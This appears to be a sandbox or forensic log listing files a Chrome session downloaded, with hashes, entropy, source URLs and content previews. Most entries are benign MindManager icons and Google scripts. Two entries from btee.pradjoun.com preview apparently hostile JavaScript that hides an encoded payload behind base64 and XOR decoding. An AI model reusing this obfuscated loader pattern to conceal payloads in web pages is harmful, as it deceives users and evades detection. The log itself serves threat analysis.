                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9a9aa3;}.cls-2{fill:#727272;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority08</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M4.94,10.06A2.4,2.4,0,0,1,5.22,9a3.38,3.38,0,0,1,.55-.84,5,5,0,0,1,.55-.49,2.48,2.48,0,0,1-.91-1.91,2.76,2.76,0,0,1,.86-2,3.4,3.4,0,0,1,2.5-.84,3.72,3.72,0,0,1,2.42.78,2.56,2.56,0,0,1,1,2.12,3.7,3.7,0,0,1-1,2.3,2.47,2.47,0,0,1,1.18,2.1,2.85,2.85,0,0,1-1,2.15,3.91,3.91,0,0,1-2.73.9,3.87,3.87,0,0,1-2.73-.92A2.87,2.87,0,0,1,4.94,10.06Zm2.5-.21a1.13,1.13,0,0,0,.35.83,1.2,1.2,0,0,0,.86.33,1.4,1.4,0,0,0,.88-.26A1,1,0,0,0,9.85,10a.48.48,0,0,0,0-.18.5.5,0,0,0-.1-.17,1,1,0,0,0-.13-.15.92.92,0,0,0-.2-.16l-.22-.14L8.9,9.05l-.28-.14-.31-.14L8,8.62A1.73,1.73,0,0,0,7.4
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):4362
                                                                Entropy (8bit):7.9327058961345776
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:28240F618AFB5A102CCD30B30D78AF0D
                                                                SHA1:47183CD811D853B81B2EF35608425CB5B94F2AA9
                                                                SHA-256:B6192DCEF42AF63089F69B1E8B40B83259B655E615A63F30FE1880F97375E03F
                                                                SHA-512:C28CAB117A8D6A16B0EB0E71D1BE35D0460FC582AAB2B1E8CD8FF2FE93D94EF4A5552FBD7427D596282D2D101974A0229798DDB6C4FDEA79BC5CB0E50600A0EF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/chromebook/app_icon_144.png
                                                                Preview:.PNG........IHDR..............F.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.ytU...G.[o..].....V...E.8@r.$.....ATTD.j.P+.Vm.)Z+"u@.........0#...a..<..............79.M~...!..........>..~..].....G rk...........aw.8.8.8.8.8..'.............q.K..Vw.\d.T..A."3....X...:}.V.?\..Df.}i..B...r..w.0y.|}zv.l`.l\........lC.......\.{...b.+...N..*M....\EA.. WJh.7..`X....r..].\......`..U....W.._..c.$.p..X.!l...9B.\..:..*..+-..f"yv...&5.f...YF.$A%.,...*..H~..(m.<Z.....Xo..6Q...J.qJ..\CuNEf.d.K......|..\..K.o.F.[_9...$RWcG....a...E.\......R=.n.!kwl..^..:.V`.J...C..s..k.y.a.....&.0o.........cr......l......!...=Q.&%.f.[......&...c.......G./....O::.E.d..hl.....<E.),..S....v..av.0.@M..+.*<...<E?..g?..hm...,Y.........Ul....v.C.x..tO...?r....vw.+...,r..(\....*.....qj_-....B..B=b....lm..0.V.6...-.....g0. V.61..._.....V.j.....X.3......8.S.Z_`./.d..Q.P......0v..+`F..s..?pzC{..2.....[.B...G..:......q.X.3`'....3y.b'h0.vR....\....Z..F....L...\..d...f.N
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:dropped
                                                                Size (bytes):720
                                                                Entropy (8bit):4.925406227349969
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3CA6BC3231E4A9588AEB0768F92D0533
                                                                SHA1:EF176BC2E3A5CC31A66E66D11CA03F579F8B917E
                                                                SHA-256:FD35E84D1919ED414D4B1F38246F36B6056BD43749C0C5A4450254AB2BB0916B
                                                                SHA-512:F8028641FB92C38D7FB9D077B16C178944B4995C053AEF7687D48A9F7511419CD3637305A832D43F8DFE6FD095E25ED1A4A50AC539C17F3ABF028A7E59E857F0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 17.52"><defs><style>.cls-1{fill:#f9d4d4;}.cls-2{fill:#ac1a14;}</style></defs><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M2.44,17.08a2,2,0,0,1-1.71-3L8.29,1.41a2,2,0,0,1,3.42,0l7.56,12.66a2,2,0,0,1-1.71,3Z"/><path class="cls-2" d="M10,.89a1.54,1.54,0,0,1,1.33.75L18.89,14.3a1.51,1.51,0,0,1,0,1.55,1.54,1.54,0,0,1-1.35.79H2.44a1.54,1.54,0,0,1-1.35-.79,1.51,1.51,0,0,1,0-1.55L8.67,1.64A1.54,1.54,0,0,1,10,.89M10,0A2.41,2.41,0,0,0,7.91,1.19L.35,13.84a2.43,2.43,0,0,0,2.09,3.68H17.56a2.43,2.43,0,0,0,2.09-3.68L12.09,1.19A2.41,2.41,0,0,0,10,0Z"/><path class="cls-2" d="M8.5,11.74v-5h2v5Zm0,3v-2h2v2Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):553
                                                                Entropy (8bit):4.970488360798494
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:938110CD8F3945AAD77226575B603184
                                                                SHA1:AF99DC6C2952A4B832A569FF7B517F1B6AE01FE9
                                                                SHA-256:1B49A43C0E21665C00DC5496C03B26F90A77916E1A951C44EF691E043F47858E
                                                                SHA-512:44A5D4D768E8A0C87F2D2154D8F7DCF1839B286458DC67DB041AFDA7C7E6B44F6493002EB4B3B685AD9F00AD0604E6414562E5CB1CC9E16F23EFDE07EE8F2086
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/key.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}</style></defs><title>key_16</title><path class="cls-1" d="M8,0a4,4,0,1,0,4,4A4,4,0,0,0,8,0ZM8,6a2,2,0,1,1,2-2A2,2,0,0,1,8,6Z"/><rect class="cls-1" x="7" y="6" width="2" height="10" rx="0.5" ry="0.5"/><rect class="cls-1" x="8" y="14" width="4" height="1" rx="0.5" ry="0.5"/><rect class="cls-1" x="8" y="12" width="2" height="1" rx="0.5" ry="0.5"/><rect class="cls-1" x="7" y="10" width="4" height="1" rx="0.5" ry="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):180
                                                                Entropy (8bit):4.847479026060686
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:50CCF8A6FF3B125B3F2F8DFD0435A82D
                                                                SHA1:3F4A5C3754570940D5A81200AC01B5E5BC182588
                                                                SHA-256:BCFE899D105C875255B1D07DA616FD0EC97BBE456B26234613E79FE295DC072B
                                                                SHA-512:BC7495D6B1405109E6A5F57A8E77B0256480B7EF57F2306FAC26336954C6F5E3419F35345F2191AF2F75716DD9CA02EA25380B08817BCD4D99E6B849128D1A93
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/marker-7.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><title>heart_grey_16 copy 2</title><polygon points="0 0 8 0 16 8 8 16 0 16 0 0"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):102796
                                                                Entropy (8bit):5.555156553131377
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C155B10A8D23A9C03F59914E5E9EE4DA
                                                                SHA1:C65E458F0B8B37BFBE3BAD8DAD92B1029EEF1F63
                                                                SHA-256:958F589234A5BF5E1423EF0A552BB9DAD8A590AD172C022E7844E88B8735D1B9
                                                                SHA-512:9447C4A4B9C8383B738A1C79CB3D474707495761298E32771176D32FF529D9D5E3D27D3CE99BBF715C5487D01069616D1AC19DD7380F16FD6F879D0050FE5EDD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQ
                                                                Preview:<script>..function KmHYGahzuV(MjdbmeIUwE, tMfKwCaukP) {..let MUQPNQvjKv = '';..MjdbmeIUwE = atob(MjdbmeIUwE);..let veVtSAHcTP = tMfKwCaukP.length;..for (let i = 0; i < MjdbmeIUwE.length; i++) {.. MUQPNQvjKv += String.fromCharCode(MjdbmeIUwE.charCodeAt(i) ^ tMfKwCaukP.charCodeAt(i % veVtSAHcTP));..}..return MUQPNQvjKv;..}..var DHCojrbfnJ = KmHYGahzuV(`SU8reHc1aQN1aR0aAlsKbDpvWD0YAk9bVQ9XbhIsG0xROj5dWDZRLUtjZRcUQRBvQyoHBx9DFBJCMA1rHRobR0dbH3xTJhELQV1FFFUhSWcWAQIYXhBFNkIwWF1BARpRHj5ZJ1sEHBUKXR8gUzscHhsJOWsQcxBpSR0MRV0RRHNDOxZTTV9AFUAgCmZaDQtZGhJfMFssAUAGWBtVHmUeeVodAFRfBER9WSZbAwZZGgtDcQ51Wh0MRV0RRG09Q1VOTxcIElMhWTkBThxFV1wSO0Q9BR1VGBsGWSdYPBdADFhZTlY2Xj1aHA5ZUARIIx4jBkEdUlgEUSBVOloKAEBaDV8yVGYDXkEDGlIfIVEnEQsXRxoMWT0eIwZMUQsbElMhWTkBUGI9FEEQcww6FhwGR0BBQyFTdFcGG0NEEgp8HyoRAAVEGgJcPEUtEwIORVFPUzxdZhQEDk8bDVkxQ2YWHBZHQA4dOUNmQUBeGQVOUyFJOQEBQl1HT106XmcfHU0JCE5DMEIgBRpROj5BEHMQdQYNHV5EFRAgQipITAdDQBFDaR9mAhkYGVMOXzRcLFsNAFobE1UwUTkBDQdWGwBAOh4jBkxRCxsSUyFZOQFQYj0UQRBzDCUcAAQXRgRcbhI6ARcD
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (1445), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):1812
                                                                Entropy (8bit):5.924442853085838
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6D8C26A1DEBC66146A4D9A4D7F079787
                                                                SHA1:1F59643BA87053FB68D7057F06CD939277E7F8B9
                                                                SHA-256:00391BC3233420A06034F1891AC0C2F4F1F705BF2A3CD740B89D4A65E7DF1E29
                                                                SHA-512:996CCEB7F7E4637E0269C04C20B3417D1E5C0A97F73A696F1A4854B0BB9A6DB066344401F7178C09C3083F3A72B420EB1D9DC9EB6905E486D8DE6D719DDE684D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://btee.pradjoun.com/XUYZ/
                                                                Preview:<script>..function ntxcZngoES(ZLlpkcHBxX, CPehKlijSa) {..let IpBdSkCFvF = '';..ZLlpkcHBxX = atob(ZLlpkcHBxX);..let CrXXNouPWI = CPehKlijSa.length;..for (let i = 0; i < ZLlpkcHBxX.length; i++) {.. IpBdSkCFvF += String.fromCharCode(ZLlpkcHBxX.charCodeAt(i) ^ CPehKlijSa.charCodeAt(i % CrXXNouPWI));..}..return IpBdSkCFvF;..}..var zlMWhASdEX = ntxcZngoES(`a3BSEFFKUUc5RGtwGAJAGF5yLjkJDhYkaF4YCm0NDxQKDEUWVFguGxITAQ0cUFlEJVQVDwwQRkoQBmRBa3AIFlxbTF4iFEYVLTlBUEhFJAk/UiUhRWxyfigvPzVHQ0k1MhdtWkYOHBoSQzU9bVpGWk5DEhhKUjkPFBROAUZXWR8sDgkYRihwT2x9BB8zIyFKGxgFCm0xJA06KXtdbW4CQWtwTkMSGEUXLhsSGQZDGl1KRWRaHXdkQxIYGBdtWkYICxdHSlYXKxsKCQtYPzIYF21aG3dkHj8yUVFlHCMZLQxGQH9tK1pbR05BEBFDOkdaRlpOFFtWXFg6VAoVDQJGUVdZYxIUHwhDDxhPXiMeCQ1AD11bWUMkFQhUHgJGUFZWIB9GUU5BDRoYHG1YPlhVbjhFNT0kHE4cKwBxV0xPCiAAWk9eDxgaFWQBa3BOQxIYUVFtUgk5NBBaSEpePiNOHCsAcVdMTwogAFNHQ0k1MhdtWkYMDxESaHpNGRQlNgcvdRgFFywOCRhGBXdbe1g5AiEgCEoJNTIXbVpGDA8RElx8fhsIEjIHIX4YBRdlKiQAOg1xdFF7ClQLGxoAWhAXHxYmEVRDPhl4Y1ZgACdXNFMfARYaEFE6VDUCH0J5GhdKS0Mz
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (10017)
                                                                Category:downloaded
                                                                Size (bytes):10245
                                                                Entropy (8bit):5.437589264532084
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240704%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240704T180453Z&X-Amz-Expires=300&X-Amz-Signature=3072b88afae2cb6c1a62c088de53286c1e2ff367bbd034314c7c352d0e067313&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=2925284&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):682
                                                                Entropy (8bit):4.98529198661557
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:8FEFA45E081715980E5261BF796DBB21
                                                                SHA1:867E4FF74F3EF888D47D452D64D9F52B6613A632
                                                                SHA-256:9E159FFBB3146DCC6A2583BB2895BBC7FE473378FE069CF8E1B7A29D021BA92F
                                                                SHA-512:E37603D733801710966B8503B995CA785D4875DA71DBD12D83B4DFD109B050DA524C00E81484FA4C3B0B818EBC29986D90C68D029F5B781573E00168655C180C
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_comment.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#7db7ea;}.cls-2{fill:#4f8ed4;}</style></defs><title>topic_info_icon_comment</title><path class="cls-1" d="M3.59,12.41l-.31-.21A6,6,0,0,1,.5,7.25C.5,3.74,3.86.88,8,.88s7.5,2.86,7.5,6.37S12.14,13.62,8,13.62a8.63,8.63,0,0,1-2.27-.3l-.16,0L3,14.32Z"/><path class="cls-2" d="M8,1.38c3.86,0,7,2.63,7,5.87s-3.14,5.87-7,5.87a8.06,8.06,0,0,1-2.14-.28l-.32-.09-.31.13-1.46.57L4,12.93l.24-.72-.62-.43A5.54,5.54,0,0,1,1,7.25C1,4,4.14,1.38,8,1.38m0-1C3.58.38,0,3.46,0,7.25a6.54,6.54,0,0,0,3,5.36l-.87,2.57L5.6,13.8a9,9,0,0,0,2.4.32c4.42,0,8-3.07,8-6.87S12.42.38,8,.38Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):3510
                                                                Entropy (8bit):7.909226144869929
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EC9C817A100453EA382320C96A43DA55
                                                                SHA1:DE6CEE7BBAA63FC82DC80E026720FB390E2E8A42
                                                                SHA-256:C18D13153F2AD893245480AB5D0BF30AFABD3F80BBB238E6A93B037F9E3E7579
                                                                SHA-512:7DAE0762F662586D164DC8A1E37FB8BB331D27679AF30F4D871EFBE8ACAA53062506291D7E3AAD21EBCC37226952FF526E8A86E50224FE5256C9A73C109965D5
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/RollUp/TaskAtRisk.png
                                                                Preview:.PNG........IHDR................a....gAMA....|.Q.... cHRM...........R...@..}y.....<.....s<.w...9iCCPPhotoshop ICC profile..H..wTT....wz..0.R.....{.^Ea..`(..34.!...ED."HP..P$VD...T..$.(1.ET,oF.........o......Z..../...K......<....Qt.....`.).LVF._.{......!r._...zX..p..3.N....Y.|......9.,...8%K.......,f.%f.(A..9a..>.,....<...9..S.b...L!G....3..,....F.0.+.7..T.3...Il.pX."6.1...."....H._q.W,.d..rIK..s...t......A..d.p....&+..g.].R.......Y2...EE.4...4432..P.u.oJ..Ez...g.........`.j..-....-....b.8....o....M</..A...qVV....2.....O.....g$>...]9.La.....+-%M.g.3Y.......u..A.x....E.....K.......i<:...............Pc...u*@~..(.. ...]..o..0 ~y.*..s..7.g...%...9.%(....3........H.*...@...C`...-p.n.......V..H.....@....A1....jP..A3h..A'8..K....n..`.L.g`......a!2D..!.H... .d..A.P....B....By.f..*...z....:....@..]h...~....L.............C.Up.......p%....;...5.6<.?.........."....G..x...G.....iE..>.&2.. oQ...EG..lQ..P......U..F.Fu.zQ7Qc.Y.G4....G......t...].nB../.o.'.1.......xb"1I.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (1434), with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):1434
                                                                Entropy (8bit):5.780814020328209
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:CAC624AB0C197840B2A21BE4B6F6CC58
                                                                SHA1:C4B8B421F6039CCB0421E814774789201138308D
                                                                SHA-256:CFCE45FEF72ED85DC66C57FD1FA7262F9686B08188832FBFCE26A7A467D455B0
                                                                SHA-512:15FAB78F7997A69C4C0A469893CC3D53D989C74736D4EFDE315005242B4545B4E8F694BEFF23D0899C59A6C3CD954F3905C7EAC4C438961931E12D666BB3A3BB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://www.google.com/recaptcha/api.js
                                                                Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var gr=w[N]=w[N]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/api2/';(cfg['render']=cfg['render']||[]).push('onload');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='Az520Inasey3TAyqLyojQa8MnmCALSEU29yQFW8dePZ7xQTvSt73pHazLFTK5f7SyLUJSo2uKLesEtEa9aUYcgMAAACPeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=';if(v&&v.cookieDeprecationLabel){v.cookieDeprecationLabel.getValue().then(function(l){if(l!=='treatment_1.1'&&l!=='treatment_1.2'&&l!=='control_1.1'){d.head.prepend(m)
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:downloaded
                                                                Size (bytes):40
                                                                Entropy (8bit):4.308694969562842
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B5A1A78CB15B96BD998E82831F18F6C6
                                                                SHA1:BEB5891DCAE63ABAB4ADD641471158878CD25CEA
                                                                SHA-256:4F0957E21A055208145D6AFBBBD1CAEB163D3FF500C77432A8C34ECD25FEAFA2
                                                                SHA-512:0B7AEC7E915D43E4A5C9048580733320B1D117D82700E213DDC6348EB433C77ED72D96A7052E8F8827A98BF411F59CB9AB8535375BE6A60D278152383C961C52
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSHgm5C_3J0lE-XxIFDWdns_4SBQ2BkPF8EgUNpZM2JA==?alt=proto
                                                                Preview:ChsKBw1nZ7P+GgAKBw2BkPF8GgAKBw2lkzYkGgA=
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):588
                                                                Entropy (8bit):4.787250517673889
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:FFDA89128B8B612FB49F1B660BB9A0C5
                                                                SHA1:31433E45C7030BFC3977AC17581398C3F2760F0B
                                                                SHA-256:D4C200B99B30DDBDBC0AAF72796002AC8C87FAFE2FF0C4E5C9AAB0DE6A1D3E7D
                                                                SHA-512:89160176557994F250B89977DD340305430D02D07BDD01DCF2E6CB3172D1D33FE510B9E3453CC52AAD10D694707F6EF831A939E50168AF74BD2476ED1738A7DE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/navigation-panel/mini-map-off.svg
                                                                Preview:<svg width="17" height="22" viewBox="0 0 17 22" fill="none" xmlns="http://www.w3.org/2000/svg">.<g opacity="0.4">.<path d="M15.4658 10.7565C14.0566 14.5001 8.46708 20.5001 8.46708 20.5001C8.46708 20.5001 2.6925 14.4999 1.43372 10.7565C0.843095 9.00008 0.868018 7.18191 1.43339 5.50008C2.09851 3.52157 4.32927 0.500084 8.46708 0.500084C12.6049 0.500084 14.8139 3.54432 15.4658 5.50008C15.9658 7.00008 15.9658 9.25649 15.4658 10.7565Z" fill="#C8C7C8" stroke="#808080" stroke-width="0.8"/>.<circle cx="8.5" cy="8.50008" r="2.6" fill="white" stroke="#808080" stroke-width="0.8"/>.</g>.</svg>.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2279
                                                                Entropy (8bit):4.906624950320475
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EB3F7C64FEAE38F9F7E188D7E4A29B4C
                                                                SHA1:C0FD4D2295A29172F5AC329FE971546E4A48B673
                                                                SHA-256:BC444359036DBA5FD9A0288492A5C35504A2EAA52B4EAE1546FF50C0A8644EF8
                                                                SHA-512:2C69BE5C0ED0F15289AED0E5E2E315F2ECDB938A03F8EF7B42BBF24C3A64795B2DA907FF40DE71BC2C6CAE262EC4D8BCBF8287F20BEA0CC38C1036ECFA24F57F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/decisiontree.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M47.9512 44.0351C49.842 44.3434 52.5833 41.9926 55.8925 34.7869C59.3991 27.1515 63.4213 24.6133 70.5376 24.6133L75.1787 24.6138" stroke="#99AB6C"/>.<path d="M101.434 24.5996C103.189 24.7537 105.735 23.5783 108.808 19.9755C112.064 16.1578 115.799 14.8887 122.407 14.8887L126.716 14.889" stroke="#ED9A61"/>.<path d="M101.434 63.4949C103.189 63.6798 105.735 62.2694 108.808 57.946C112.064 53.3647 115.799 51.8418 122.407 51.8418L126.716 51.8421" stroke="#ED9A61"/>.<path d="M47.9512 44.088C49.842 43.7797 52.5833 46.1305 55.8925 53.3362C59.3991 60.9716 63.4213 63.5098 70.5376 63.5098L75.1787 63.5092" stroke="#ED9A61"/>.<path d="M101.434 24.6254C103.189 24.4867 105.735 25.5446 108.808 28.7871C112.064 32.223 115.799 33.3652 122.407 33.3652L126.716 33.365" stroke="#99AB6C"/>.<path d="M101.434 63.525C103.189 63.3555 105.735 64.6484 108.808 68.6116C112.064 72.811 115.799 74.207 122.407 74.207L1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1298
                                                                Entropy (8bit):4.957678292848224
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7744FAB6D1B4AD2A0CEF8E71FD293352
                                                                SHA1:AEF121777150A14724EB5B3C0C5363E00827F0A2
                                                                SHA-256:2E6E113FBBD2B24CE9A89BD6FF3945754A0F40DF879BA1466B30E142D3FF387C
                                                                SHA-512:A0E4C895A1E1D3D4D510206919F1BC87DC45A4059233FC80466ECB16C28A09F90C23F1548EBB6AD54707AA60AE0399BEC673EB43119C2FA4E4A2A233D51D6A07
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/fax.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#999;}.cls-2{fill:#ccc;}.cls-3{fill:#b3b3b3;}.cls-4{fill:#fff;}.cls-5{fill:gray;}.cls-6{fill:#e6e6e6;}</style></defs><title>Fax_machine_16</title><rect class="cls-1" x="3" width="10" height="6"/><rect class="cls-2" x="0.5" y="3.5" width="15" height="12" rx="1.5" ry="1.5"/><path class="cls-3" d="M14,4a1,1,0,0,1,1,1v9a1,1,0,0,1-1,1H2a1,1,0,0,1-1-1V5A1,1,0,0,1,2,4H14m0-1H2A2,2,0,0,0,0,5v9a2,2,0,0,0,2,2H14a2,2,0,0,0,2-2V5a2,2,0,0,0-2-2Z"/><rect class="cls-4" x="4" y="1" width="8" height="4"/><rect class="cls-5" x="2" y="7" width="3" height="7" rx="1.5" ry="1.5"/><rect class="cls-6" x="7.5" y="7.5" width="6" height="2"/><path class="cls-3" d="M13,8V9H8V8h5m1-1H7v3h7V7Z"/><rect class="cls-1" x="7" y="11" width="1" height="1"/><rect class="cls-1" x="9" y="11" width="1" height="1"/><rect class="cls-1" x="11" y="11" width="1" height="1"/><rect class="cls-1" x="13" y="11" width="
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):338
                                                                Entropy (8bit):5.1190110365421
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:7927627BA921E787BC19238A038AA768
                                                                SHA1:0B26072FAF78D66A4FCA0265AAE1E258AAD1A447
                                                                SHA-256:916BA1FDA65F1A4A9508AB6F78F20C96D3DD47DBA0C9A91D0406DAC0D369A32C
                                                                SHA-512:7B5BFA6B525137FE89327E7B8EC6B19E16EAD82F4FA53B43E35E1F17D0731DF659630F58FA015AD72D29AE40797DB38B5323087CCC812933730D0147D43B3FBE
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/arrow-left.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#f03637;}</style></defs><title>thickarrow_left_red_16</title><rect class="cls-1" x="6.5" y="2.5" width="8" height="11" transform="translate(18.5 -2.5) rotate(90)"/><polygon class="cls-1" points="0 8 8 0 8 16 0 8"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1672
                                                                Entropy (8bit):4.540111013867941
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:A0021882CC6AEB7E6463092EE6FD82D0
                                                                SHA1:6B2B67045F8DDA45F6159C7BC9766B80C863BEF4
